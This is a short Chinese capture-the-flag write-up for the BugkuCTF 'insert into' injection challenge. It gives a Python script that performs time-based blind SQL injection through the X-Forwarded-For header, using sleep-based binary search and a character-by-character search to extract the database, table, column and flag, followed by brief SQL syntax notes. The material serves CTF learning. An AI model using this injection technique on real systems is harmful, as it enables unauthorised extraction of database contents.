CTF - BugkuCTF-insert into注入

代码如下

# -*- coding:utf-8 -*-
import requests
#"database()" 5 web15 确定数据库
#"(select group_concat(table_name) from information_schema.tables where table_schema='web15')" 14 client_ip,flag 确定表名
#"(select group_concat(column_name) from information_schema.columns where table_name='flag')" 4 flag 确定列名
payload = "(select group_concat(flag) from flag)" #32 cdbf14c9551d5be5612f7bb5d2867853 dump数据
def getlen(payload):
    payload_length = "'+ (select case when length(%s)>%d then sleep(2) end)); -- '" #网络环境差的情况下可以把延迟改高
    maxv = 300
    minv = 0
    while True:
        mid = (maxv+minv)/2
        rq = requests.get("http://123.206.87.240:8002/web15/",headers={"X-Forwarded-For":payload_length%(payload,mid)})
        if rq.elapsed.seconds >= 2:
            minv = mid
        else:
            maxv = mid
        if (maxv-minv) in [0,1]:
            break        
    print "[+] The length is %d"%maxv
    return maxv
def getchar(payload,length):
    payload_ascii = "'+ (select case when ord(substr(%s from %d for 1))=%d then sleep(2) end)); -- '"
    result = ''
    for i in range(length):
        for char in range(32,127):
            rq = requests.get("http://123.206.87.240:8002/web15/",headers={"X-Forwarded-For":payload_ascii%(payload,i+1,char)})
            if rq.elapsed.seconds >= 2:
                result += chr(char)
                print result+('.'*(length-i-1))
                break                            
    print "[+] The char is %s"%result
leng = getlen(payload)
getchar(payload, leng)

知识点

1. substr(‘abc’ from 1 for 1)
2. select case when 表达式 then 表达式 end 等价于IF(表达式，TRUE，False)
3. like关键字不区分大小写且匹配时需要处理%，_。并且在本题中还不能出现，符号。